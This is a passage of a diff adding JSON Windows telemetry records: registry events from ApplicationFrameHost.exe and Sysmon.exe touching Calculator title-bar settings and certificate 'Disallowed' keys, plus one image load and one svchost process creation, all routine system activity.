"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "CapabilityAccessManagerClient.dll", + "image_path": "C:\\Windows\\System32\\CapabilityAccessManagerClient.dll", + "pid": 4744, + "process_name": "explorer.exe", + "process_path": "C:\\Windows\\explorer.exe", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k appmodel -p -s camsvc", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 4052, + "ppid": 568, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "create", + "timestamp": 131883573250320000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}", + "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", + "user": "NT AUTHORITY\\SYSTEM", + 